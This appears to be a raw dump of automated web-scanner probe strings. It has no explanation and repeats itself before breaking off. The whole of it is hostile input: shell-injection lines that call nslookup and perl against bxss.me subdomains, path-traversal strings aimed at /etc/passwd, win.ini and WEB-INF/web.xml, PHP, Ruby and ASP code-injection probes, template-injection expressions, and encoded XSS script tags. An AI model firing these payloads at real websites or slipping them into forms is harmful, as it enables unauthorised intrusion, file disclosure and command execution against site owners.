1
${9999028+9999088}
g2caoP6c
&n955807=v983696
12345'"\'\");|]*%00{%0d%0a%bf%27'????
'.gethostbyname(lc('hitmr'.'qubwtwod6add8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(65).chr(120).chr(85).'
".gethostbyname(lc("hitvb"."yrausgwo9d546.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(84).chr(113).chr(76)."
1INX3IttlO
"+"A".concat(70-3).concat(22*4).concat(122).concat(68).concat(104).concat(79)+(require"socket" Socket.gethostbyname("hitjo"+"tdkukcwfb4016.bxss.me.")[3].to_s)+"
)
'+'A'.concat(70-3).concat(22*4).concat(100).concat(85).concat(122).concat(66)+(require'socket' Socket.gethostbyname('hitoo'+'comcczese5e04.bxss.me.')[3].to_s)+'
!(()&&!|*|*|
^(#$!@#$)(()))******
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
'"
response.write(9817777*9631557)
/xfs.bxss.me
'+response.write(9817777*9631557)+'
989022
"+response.write(9817777*9631557)+"
http://xfs.bxss.me
//xfs.bxss.me
/\xfs.bxss.me
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt%3F.jpg
bxss.me
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
echo zcfhzz$()\ rqiqns\nz^xyu||a #' &echo zcfhzz$()\ rqiqns\nz^xyu||a #|" &echo zcfhzz$()\ rqiqns\nz^xyu||a #
&echo ihxgqq$()\ xtuxij\nz^xyu||a #' &echo ihxgqq$()\ xtuxij\nz^xyu||a #|" &echo ihxgqq$()\ xtuxij\nz^xyu||a #
|echo ueygaf$()\ hyrncq\nz^xyu||a #' |echo ueygaf$()\ hyrncq\nz^xyu||a #|" |echo ueygaf$()\ hyrncq\nz^xyu||a #
(nslookup hitqulkaxbjgtd3d1e.bxss.me||perl -e "gethostbyname('hitqulkaxbjgtd3d1e.bxss.me')")
$(nslookup hitnfkpelisgx8d265.bxss.me||perl -e "gethostbyname('hitnfkpelisgx8d265.bxss.me')")
&(nslookup hitdmqjvtwyxu9b25e.bxss.me||perl -e "gethostbyname('hitdmqjvtwyxu9b25e.bxss.me')")&'\"`0&(nslookup hitdmqjvtwyxu9b25e.bxss.me||perl -e "gethostbyname('hitdmqjvtwyxu9b25e.bxss.me')")&`'
|(nslookup hitoywtnbwgvb7e792.bxss.me||perl -e "gethostbyname('hitoywtnbwgvb7e792.bxss.me')")
`(nslookup hitazpyypwzrb1a8f0.bxss.me||perl -e "gethostbyname('hitazpyypwzrb1a8f0.bxss.me')")`
;(nslookup hitpbfnzjttem7b26b.bxss.me||perl -e "gethostbyname('hitpbfnzjttem7b26b.bxss.me')")|(nslookup hitpbfnzjttem7b26b.bxss.me||perl -e "gethostbyname('hitpbfnzjttem7b26b.bxss.me')")&(nslookup hitpbfnzjttem7b26b.bxss.me||perl -e "gethostbyname('hitpbfnzjttem7b26b.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
/WEB-INF/web.xml
C:\WINDOWS\system32\drivers\etc\hosts
../../../../../../../../../../windows/win.ini%00.jpg
/../../../../../../../../../../boot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
1'"()&%2G5C(9650)
'"()&%2G5C(9256)
19354710
acu2603%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2603
acux9460%C0%BEz1%C0%BCz2a%90bcxuca9460
1}}"}}'}}1%>"%>'%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
12G5C(9939)
1IWMOT[!+!]
12G5C(9868)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%32%47%35%43%28%39%37%33%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
12G5C(9973)
12G5C(9897)
%31%3C%53%63%52%69%50%74%20%3E%32%47%35%43%289313%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\2G5C(9870)\u003C/sCripT\u003E
1<ScRiPt>2G5C(9261)</sCripT>
?
1}body{acu:Expre/**/SSion(2G5C(9161))}
18QJNo 2G5C(9441)
1MQR9D[!+!]
1'"()&%OtJO(9442)
'"()&%OtJO(9145)
19717066
acu7067%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7067
acux7886%C0%BEz1%C0%BCz2a%90bcxuca7886
1OtJO(9273)
1HYGQK[!+!]
1OtJO(9146)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4F%74%4A%4F%28%39%34%37%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1OtJO(9196)
1OtJO(9558)
%31%3C%53%63%52%69%50%74%20%3E%4F%74%4A%4F%289614%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\OtJO(9715)\u003C/sCripT\u003E
1<ScRiPt>OtJO(9774)</sCripT>
1}body{acu:Expre/**/SSion(OtJO(9109))}
1bAEHS OtJO(9175)
16UW1M[!+!]
1'"()&%chAq(9206)
'"()&%chAq(9469)
19592507
acu6932%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6932
acux4411%C0%BEz1%C0%BCz2a%90bcxuca4411
1'"()&%pbal(9130)
1chAq(9714)
'"()&%pbal(9595)
15LHIL[!+!]
19324215
1chAq(9145)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%63%68%41%71%28%39%35%37%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
acu7810%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7810
1chAq(9679)
acux3936%C0%BEz1%C0%BCz2a%90bcxuca3936
1chAq(9905)
%31%3C%53%63%52%69%50%74%20%3E%63%68%41%71%289885%29%3C%2F%73%43%72%69%70%54%3E
1pbal(9612)
1\u003CScRiPt\chAq(9976)\u003C/sCripT\u003E
1IDC8D[!+!]
1pbal(9592)
1<ScRiPt>chAq(9622)</sCripT>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%70%62%61%6C%28%39%34%35%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1pbal(9642)
1}body{acu:Expre/**/SSion(chAq(9853))}
1pbal(9661)
1KazRJ chAq(9000)
14MLZO[!+!]
%31%3C%53%63%52%69%50%74%20%3E%70%62%61%6C%289158%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\pbal(9001)\u003C/sCripT\u003E
1<ScRiPt>pbal(9166)</sCripT>
1}body{acu:Expre/**/SSion(pbal(9838))}
1mahEV pbal(9229)
1JPLMT[!+!]
kYlIeuLa
${10000375+10000240}
&n935791=v901375
1BqKpV5slNO
"+"A".concat(70-3).concat(22*4).concat(112).concat(85).concat(100).concat(86)+(require"socket" Socket.gethostbyname("hitwv"+"apcvhbzz8d5f4.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(116).concat(76).concat(105).concat(70)+(require'socket' Socket.gethostbyname('hitbg'+'aagwkmumfc22a.bxss.me.')[3].to_s)+'
'.gethostbyname(lc('hitrf'.'stjwbrhj2cec2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(118).chr(82).'
".gethostbyname(lc("hiths"."efcifqif494ad.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(79).chr(118).chr(89)."
response.write(9936057*9753175)
'+response.write(9936057*9753175)+'
"+response.write(9936057*9753175)+"
911386
echo vkacjs$()\ hrczet\nz^xyu||a #' &echo vkacjs$()\ hrczet\nz^xyu||a #|" &echo vkacjs$()\ hrczet\nz^xyu||a #
&echo rgrypa$()\ fbmdex\nz^xyu||a #' &echo rgrypa$()\ fbmdex\nz^xyu||a #|" &echo rgrypa$()\ fbmdex\nz^xyu||a #
|echo uxywry$()\ kwpmse\nz^xyu||a #' |echo uxywry$()\ kwpmse\nz^xyu||a #|" |echo uxywry$()\ kwpmse\nz^xyu||a #
(nslookup hitoxsqznbarz03b93.bxss.me||perl -e "gethostbyname('hitoxsqznbarz03b93.bxss.me')")
$(nslookup hitnyomxihrzof08a8.bxss.me||perl -e "gethostbyname('hitnyomxihrzof08a8.bxss.me')")
&(nslookup hitcnzvomrdrv7706a.bxss.me||perl -e "gethostbyname('hitcnzvomrdrv7706a.bxss.me')")&'\"`0&(nslookup hitcnzvomrdrv7706a.bxss.me||perl -e "gethostbyname('hitcnzvomrdrv7706a.bxss.me')")&`'
|(nslookup hityjrojhltbk3108a.bxss.me||perl -e "gethostbyname('hityjrojhltbk3108a.bxss.me')")
`(nslookup hitfziuobmvqe82fa2.bxss.me||perl -e "gethostbyname('hitfziuobmvqe82fa2.bxss.me')")`
;(nslookup hityduvdcsjdg8fbdb.bxss.me||perl -e "gethostbyname('hityduvdcsjdg8fbdb.bxss.me')")|(nslookup hityduvdcsjdg8fbdb.bxss.me||perl -e "gethostbyname('hityduvdcsjdg8fbdb.bxss.me')")&(nslookup hityduvdcsjdg8fbdb.bxss.me||perl -e "gethostbyname('hityduvdcsjdg8fbdb.bxss.me')")
1'"()&%SdOc(9216)
1'"()&%HcUW(9191)
'"()&%HcUW(9659)
'"()&%SdOc(9834)
19608113
19850150
acu9814%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9814
acu4718%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4718
acux8152%C0%BEz1%C0%BCz2a%90bcxuca8152
acux2344%C0%BEz1%C0%BCz2a%90bcxuca2344
1HcUW(9079)
1NNGAG[!+!]
1HcUW(9279)
1SdOc(9368)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%48%63%55%57%28%39%34%37%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1VPEWY[!+!]
1HcUW(9373)
1SdOc(9556)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%64%4F%63%28%39%31%30%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1HcUW(9496)
1SdOc(9250)
1'"()&%vx9d(9840)
1SdOc(9518)
'"()&%vx9d(9349)
19371939
%31%3C%53%63%52%69%50%74%20%3E%48%63%55%57%289144%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\HcUW(9052)\u003C/sCripT\u003E
1<ScRiPt>HcUW(9312)</sCripT>
%31%3C%53%63%52%69%50%74%20%3E%53%64%4F%63%289866%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\SdOc(9355)\u003C/sCripT\u003E
1<ScRiPt>SdOc(9642)</sCripT>
1}body{acu:Expre/**/SSion(HcUW(9682))}
1eN38Y HcUW(9133)
1AH8AG[!+!]
1}body{acu:Expre/**/SSion(SdOc(9007))}
1sCVy3 SdOc(9569)
1WSWGX[!+!]
з>
1
1
1
1
1
${9999028+9999088}
1
g2caoP6c
1
&n955807=v983696
1
12345'"\'\");|]*%00{%0d%0a%bf%27'????
1
'.gethostbyname(lc('hitmr'.'qubwtwod6add8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(65).chr(120).chr(85).'
1
".gethostbyname(lc("hitvb"."yrausgwo9d546.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(84).chr(113).chr(76)."
1
1INX3IttlO
"+"A".concat(70-3).concat(22*4).concat(122).concat(68).concat(104).concat(79)+(require"socket" Socket.gethostbyname("hitjo"+"tdkukcwfb4016.bxss.me.")[3].to_s)+"
)
'+'A'.concat(70-3).concat(22*4).concat(100).concat(85).concat(122).concat(66)+(require'socket' Socket.gethostbyname('hitoo'+'comcczese5e04.bxss.me.')[3].to_s)+'
!(()&&!|*|*|
^(#$!@#$)(()))******
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
'"
response.write(9817777*9631557)
/xfs.bxss.me
'+response.write(9817777*9631557)+'
989022
"+response.write(9817777*9631557)+"
http://xfs.bxss.me
//xfs.bxss.me
/\xfs.bxss.me
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt%3F.jpg
bxss.me
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
echo zcfhzz$()\ rqiqns\nz^xyu||a #' &echo zcfhzz$()\ rqiqns\nz^xyu||a #|" &echo zcfhzz$()\ rqiqns\nz^xyu||a #
&echo ihxgqq$()\ xtuxij\nz^xyu||a #' &echo ihxgqq$()\ xtuxij\nz^xyu||a #|" &echo ihxgqq$()\ xtuxij\nz^xyu||a #
|echo ueygaf$()\ hyrncq\nz^xyu||a #' |echo ueygaf$()\ hyrncq\nz^xyu||a #|" |echo ueygaf$()\ hyrncq\nz^xyu||a #
(nslookup hitqulkaxbjgtd3d1e.bxss.me||perl -e "gethostbyname('hitqulkaxbjgtd3d1e.bxss.me')")
$(nslookup hitnfkpelisgx8d265.bxss.me||perl -e "gethostbyname('hitnfkpelisgx8d265.bxss.me')")
&(nslookup hitdmqjvtwyxu9b25e.bxss.me||perl -e "gethostbyname('hitdmqjvtwyxu9b25e.bxss.me')")&'\"`0&(nslookup hitdmqjvtwyxu9b25e.bxss.me||perl -e "gethostbyname('hitdmqjvtwyxu9b25e.bxss.me')")&`'
|(nslookup hitoywtnbwgvb7e792.bxss.me||perl -e "gethostbyname('hitoywtnbwgvb7e792.bxss.me')")
`(nslookup hitazpyypwzrb1a8f0.bxss.me||perl -e "gethostbyname('hitazpyypwzrb1a8f0.bxss.me')")`
;(nslookup hitpbfnzjttem7b26b.bxss.me||perl -e "gethostbyname('hitpbfnzjttem7b26b.bxss.me')")|(nslookup hitpbfnzjttem7b26b.bxss.me||perl -e "gethostbyname('hitpbfnzjttem7b26b.bxss.me')")&(nslookup hitpbfnzjttem7b26b.bxss.me||perl -e "gethostbyname('hitpbfnzjttem7b26b.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
/WEB-INF/web.xml
C:\WINDOWS\system32\drivers\etc\hosts
../../../../../../../../../../windows/win.ini%00.jpg
/../../../../../../../../../../boot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
